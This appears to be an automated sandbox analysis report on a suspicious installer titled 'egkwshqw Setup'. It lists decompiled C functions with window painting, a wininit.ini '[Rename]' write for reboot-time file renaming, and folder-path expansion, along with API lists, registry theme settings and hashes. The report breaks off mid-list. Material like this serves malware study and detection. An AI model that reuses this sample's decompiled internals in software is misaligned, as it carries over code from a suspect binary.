                                                  Uniqueness Score: -1.00%

                                                  Function 00401000, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 90%
                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42ec30; // 0x79ee58
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "egkwshqw Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x42ec28; // 0x170078
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                                                  0x0040100a
                                                  0x00401039
                                                  0x00401047
                                                  0x0040104d
                                                  0x00401051
                                                  0x0040105b
                                                  0x00401061
                                                  0x00401064
                                                  0x004010f3
                                                  0x00401089
                                                  0x0040108c
                                                  0x004010a6
                                                  0x004010bd
                                                  0x004010cc
                                                  0x004010cf
                                                  0x004010d5
                                                  0x004010d9
                                                  0x004010e4
                                                  0x004010ed
                                                  0x004010ef
                                                  0x004010ef
                                                  0x00401100
                                                  0x00401105
                                                  0x0040110d
                                                  0x00401110
                                                  0x00401112
                                                  0x00401118
                                                  0x0040111f
                                                  0x00401126
                                                  0x00401130
                                                  0x00401142
                                                  0x00401156
                                                  0x00401160
                                                  0x00401165
                                                  0x00401165
                                                  0x00401110
                                                  0x0040116e
                                                  0x00000000
                                                  0x00401178
                                                  0x00401010
                                                  0x00401013
                                                  0x00401015
                                                  0x00401019
                                                  0x0040101f
                                                  0x0040101f
                                                  0x00000000

                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32 ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32 ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextA.USER32(00000000,egkwshqw Setup,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F$Xy$egkwshqw Setup
                                                  • API String ID: 941294808-3058710726
                                                  • Opcode ID: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                                  • Instruction ID: 9dd9d9e9de989eb397972ae7cf78bef649c8fbd879b4abede4b5176bd3adbacf
                                                  • Opcode Fuzzy Hash: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                                  • Instruction Fuzzy Hash: 08419D71804249AFCB058F95DD459BFBFB9FF44314F00802AF951AA1A0C738E951DFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405915, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E00405915(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F57(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x42ecb0 =  *0x42ecb0 + 1;
						return _t20;
					}
				}
				 *0x42c230 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bca8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x42b8a8, "%s=%s\r\n", 0x42c230, 0x42bca8);
						_t18 =  *0x42ec30; // 0x79ee58
						_t56 = _t55 + 0x10;
						E00405BE9(_t43, 0x400, 0x42bca8, 0x42bca8,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040589E(0x42bca8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405813(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405813(_t26 + 0xa, 0x4093e4);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040585F(_t51 + _t29, 0x42b8a8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405BC7(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040589E(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x42c230, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                                                  0x0040591b
                                                  0x00405922
                                                  0x00405926
                                                  0x0040592f
                                                  0x00405933
                                                  0x00405a72
                                                  0x00405a72
                                                  0x00000000
                                                  0x00405a72
                                                  0x00405933
                                                  0x0040593f
                                                  0x00405955
                                                  0x0040597d
                                                  0x00405988
                                                  0x0040598c
                                                  0x004059ac
                                                  0x004059ae
                                                  0x004059b3
                                                  0x004059bd
                                                  0x004059ca
                                                  0x004059cf
                                                  0x004059d4
                                                  0x004059d8
                                                  0x00000000
                                                  0x00000000
                                                  0x004059e7
                                                  0x004059e9
                                                  0x004059f6
                                                  0x004059fa
                                                  0x00405a6b
                                                  0x00405a6c
                                                  0x00000000
                                                  0x00405a16
                                                  0x00405a23
                                                  0x00405a88
                                                  0x00405a8f
                                                  0x00405a36
                                                  0x00405a36
                                                  0x00405a38
                                                  0x00405a41
                                                  0x00405a4c
                                                  0x00405a5e
                                                  0x00405a65
                                                  0x00000000
                                                  0x00405a65
                                                  0x00405a91
                                                  0x00405a92
                                                  0x00405a97
                                                  0x00405a99
                                                  0x00405aa6
                                                  0x00405aa6
                                                  0x00405aaa
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405a9b
                                                  0x00405a9b
                                                  0x00405a9e
                                                  0x00405aa1
                                                  0x00405aa2
                                                  0x00000000
                                                  0x00405a9b
                                                  0x00405a2e
                                                  0x00405a33
                                                  0x00000000
                                                  0x00405a33
                                                  0x004059fa
                                                  0x00405957
                                                  0x00405962
                                                  0x0040596b
                                                  0x0040596f
                                                  0x00000000
                                                  0x00000000
                                                  0x0040596f
                                                  0x00405a7c

                                                  APIs
                                                    • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                    • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004056AA,?,00000000,000000F1,?), ref: 00405962
                                                  • GetShortPathNameA.KERNEL32 ref: 0040596B
                                                  • GetShortPathNameA.KERNEL32 ref: 00405988
                                                  • wsprintfA.USER32 ref: 004059A6
                                                  • GetFileSize.KERNEL32(00000000,00000000,0042BCA8,C0000000,00000004,0042BCA8,?,?,?,00000000,000000F1,?), ref: 004059E1
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059F0
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405A06
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8A8,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A4C
                                                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A5E
                                                  • GlobalFree.KERNEL32 ref: 00405A65
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A6C
                                                    • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                                    • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                  • String ID: %s=%s$Xy$[Rename]
                                                  • API String ID: 3445103937-658998945
                                                  • Opcode ID: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                                  • Instruction ID: 64f3c6dc45b3b00a74ff67058550f3a5a1124089509923db9c5fc79d761d9fea
                                                  • Opcode Fuzzy Hash: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                                  • Instruction Fuzzy Hash: 8941E131B05B166BD3206B619D89F6B3A5CDF45755F04063AFD05F22C1EA3CA8008EBE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405BE9, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 197stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E00405BE9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42e3fc; // 0x7a3d7a
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x42ec58; // 0x7a2864
				_t74 = _t73 + _t36;
				_t37 = 0x42dbc0;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x42dbc0;
				if(_a4 - 0x42dbc0 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BE9(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x42dbc0;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x42f000;
							E00405BC7(_t86, (_t95 << 0xa) + 0x42f000);
						} else {
							E00405B25(_t86,  *0x42ec28);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405E29(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x42eca4;
						if( *0x42eca4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x42ec24; // 0x74691340
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x42ec58;
							E00405AAE(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x42ec58, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BE9(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405BC7(_a4, _t37);
			}






























                                                  0x00405be9
                                                  0x00405be9
                                                  0x00405be9
                                                  0x00405bef
                                                  0x00405bf4
                                                  0x00405bf6
                                                  0x00405c05
                                                  0x00405c05
                                                  0x00405c07
                                                  0x00405c10
                                                  0x00405c12
                                                  0x00405c17
                                                  0x00405c1a
                                                  0x00405c1b
                                                  0x00405c22
                                                  0x00405c24
                                                  0x00405c2a
                                                  0x00405c2d
                                                  0x00405c2d
                                                  0x00405e06
                                                  0x00405e06
                                                  0x00405e0a
                                                  0x00000000
                                                  0x00000000
                                                  0x00405c3a
                                                  0x00405c40
                                                  0x00000000
                                                  0x00000000
                                                  0x00405c46
                                                  0x00405c47
                                                  0x00405c4a
                                                  0x00405c4d
                                                  0x00405df9
                                                  0x00405e03
                                                  0x00405e05
                                                  0x00405e05
                                                  0x00405dfb
                                                  0x00405dfd
                                                  0x00405dff
                                                  0x00405e00
                                                  0x00405e00
                                                  0x00000000
                                                  0x00405df9
                                                  0x00405c53
                                                  0x00405c57
                                                  0x00405c67
                                                  0x00405c6b
                                                  0x00405c72
                                                  0x00405c75
                                                  0x00405c79
                                                  0x00405c7f
                                                  0x00405c82
                                                  0x00405c85
                                                  0x00405c88
                                                  0x00405da3
                                                  0x00405da6
                                                  0x00405dd6
                                                  0x00405dd9
                                                  0x00405dde
                                                  0x00405de2
                                                  0x00405de2
                                                  0x00405de7
                                                  0x00405de8
                                                  0x00405ded
                                                  0x00405df0
                                                  0x00405df2
                                                  0x00000000
                                                  0x00405df2
                                                  0x00405da8
                                                  0x00405dab
                                                  0x00405dc0
                                                  0x00405dc7
                                                  0x00405dad
                                                  0x00405db4
                                                  0x00405db4
                                                  0x00405dcf
                                                  0x00405dd2
                                                  0x00405d9b
                                                  0x00405d9c
                                                  0x00405d9c
                                                  0x00000000
                                                  0x00405dd2
                                                  0x00405c90
                                                  0x00405c91
                                                  0x00405c97
                                                  0x00405c99
                                                  0x00405cb3
                                                  0x00405cb3
                                                  0x00405cba
                                                  0x00405cba
                                                  0x00405cc1
                                                  0x00405cc5
                                                  0x00405cc5
                                                  0x00405cc6
                                                  0x00405cc8
                                                  0x00405d01
                                                  0x00405d04
                                                  0x00405d14
                                                  0x00405d17
                                                  0x00405d1f
                                                  0x00405d25
                                                  0x00405d25
                                                  0x00405d81
                                                  0x00405d81
                                                  0x00405d83
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d29
                                                  0x00405d30
                                                  0x00405d31
                                                  0x00405d33
                                                  0x00405d4d
                                                  0x00405d5b
                                                  0x00405d61
                                                  0x00405d63
                                                  0x00405d7e
                                                  0x00405d7e
                                                  0x00405d7e
                                                  0x00000000
                                                  0x00405d7e
                                                  0x00405d69
                                                  0x00405d74
                                                  0x00405d7a
                                                  0x00405d7c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d7c
                                                  0x00405d35
                                                  0x00405d38
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d47
                                                  0x00405d49
                                                  0x00405d4b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d4b
                                                  0x00000000
                                                  0x00405d81
                                                  0x00405d0c
                                                  0x00000000
                                                  0x00405cca
                                                  0x00405ccf
                                                  0x00405ce5
                                                  0x00405cea
                                                  0x00405ced
                                                  0x00405d8a
                                                  0x00405d8a
                                                  0x00405d8e
                                                  0x00405d96
                                                  0x00405d96
                                                  0x00000000
                                                  0x00405d8e
                                                  0x00405cf7
                                                  0x00405d85
                                                  0x00405d85
                                                  0x00405d88
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d88
                                                  0x00405cc8
                                                  0x00405c9b
                                                  0x00405c9f
                                                  0x00000000
                                                  0x00000000
                                                  0x00405ca1
                                                  0x00405ca5
                                                  0x00000000
                                                  0x00000000
                                                  0x00405ca7
                                                  0x00405cab
                                                  0x00000000
                                                  0x00405cad
                                                  0x00405cad
                                                  0x00000000
                                                  0x00405cad
                                                  0x00405cab
                                                  0x00405e10
                                                  0x00405e1a
                                                  0x00405e26
                                                  0x00405e26
                                                  0x00000000

                                                  APIs
                                                  • GetVersion.KERNEL32(00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405C91
                                                  • GetSystemDirectoryA.KERNEL32 ref: 00405D0C
                                                  • GetWindowsDirectoryA.KERNEL32(rtrystwqtc,00000400), ref: 00405D1F
                                                  • SHGetSpecialFolderLocation.SHELL32(?,0041F64C), ref: 00405D5B
                                                  • SHGetPathFromIDListA.SHELL32(0041F64C,rtrystwqtc), ref: 00405D69
                                                  • CoTaskMemFree.OLE32(0041F64C), ref: 00405D74
                                                  • lstrcatA.KERNEL32(rtrystwqtc,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D96
                                                  • lstrlenA.KERNEL32(rtrystwqtc,00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405DE8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$d(z$rtrystwqtc$z=z
                                                  • API String ID: 900638850-1208194997
                                                  • Opcode ID: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                                  • Instruction ID: 131396e9090e0f007f21196dc47e10b2e1a614011cd8a075e276219472c4ac8b
                                                  • Opcode Fuzzy Hash: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                                  • Instruction Fuzzy Hash: EA510531A04A04ABEB215B65DC88BBF3BA4DF05714F10823BE911B62D1D73C59429E5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10003AD0, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 164registrymemorystringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Local$AllocEnvironmentExpandFreeQueryStringsValue$Close_memsetlstrcpylstrlen
                                                  • String ID: (hkey=%p,%s,%p)
                                                  • API String ID: 635717125-193384532
                                                  • Opcode ID: 9b225da0aaf896812b149113195be377f8b47db604d3d868dda308774e68b533
                                                  • Instruction ID: 1011d7243061e5562b31b92ba7df54f300b98b5ece319cf55dcf47d29dde945c
                                                  • Opcode Fuzzy Hash: 9b225da0aaf896812b149113195be377f8b47db604d3d868dda308774e68b533
                                                  • Instruction Fuzzy Hash: 0D816AB4D043599FDB04EFA8D58969EBBF0FF48340F10892AE899A7314D774A944CF92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 100015C0, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 103registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32 ref: 10001625
                                                    • Part of subcall function 10003D50: RegCreateKeyExW.ADVAPI32 ref: 10003DAB
                                                    • Part of subcall function 10003D50: GetSysColor.USER32 ref: 10003DD4
                                                    • Part of subcall function 10003D50: _strlen.LIBCMT ref: 10003E40
                                                    • Part of subcall function 10003D50: RegSetValueExA.ADVAPI32 ref: 10003E77
                                                    • Part of subcall function 10003D50: RegCloseKey.ADVAPI32 ref: 10003E94
                                                  • SystemParametersInfoW.USER32 ref: 10001678
                                                  • RegSetValueExW.ADVAPI32 ref: 100016C1
                                                  • _memset.LIBCMT ref: 10001701
                                                  • SystemParametersInfoW.USER32 ref: 10001731
                                                  • RegSetValueExW.ADVAPI32 ref: 1000177A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Value$CreateInfoParametersSystem$CloseColor_memset_strlen
                                                  • String ID: ?$NonClientMetrics$Software\Microsoft\Windows\CurrentVersion\ThemeManager$\
                                                  • API String ID: 4214700841-1143970397
                                                  • Opcode ID: ecb6221c902d1d90f029a9aa8135ace11849b97b5f4bd3980d845a289d195a75
                                                  • Instruction ID: b10f47c284f4a25536da697fad620665cb1854ce7e8a2539d6541ec92191b9c4
                                                  • Opcode Fuzzy Hash: ecb6221c902d1d90f029a9aa8135ace11849b97b5f4bd3980d845a289d195a75
                                                  • Instruction Fuzzy Hash: C551A3B48083159FDB54DF64C89839EBBF0FB84344F10895DE499A7350DB759A88CF82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10001C20, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 10003D50: RegCreateKeyExW.ADVAPI32 ref: 10003DAB
                                                    • Part of subcall function 10003D50: GetSysColor.USER32 ref: 10003DD4
                                                    • Part of subcall function 10003D50: _strlen.LIBCMT ref: 10003E40
                                                    • Part of subcall function 10003D50: RegSetValueExA.ADVAPI32 ref: 10003E77
                                                    • Part of subcall function 10003D50: RegCloseKey.ADVAPI32 ref: 10003E94
                                                  • SystemParametersInfoW.USER32 ref: 10001C76
                                                  • SystemParametersInfoW.USER32 ref: 10001CB0
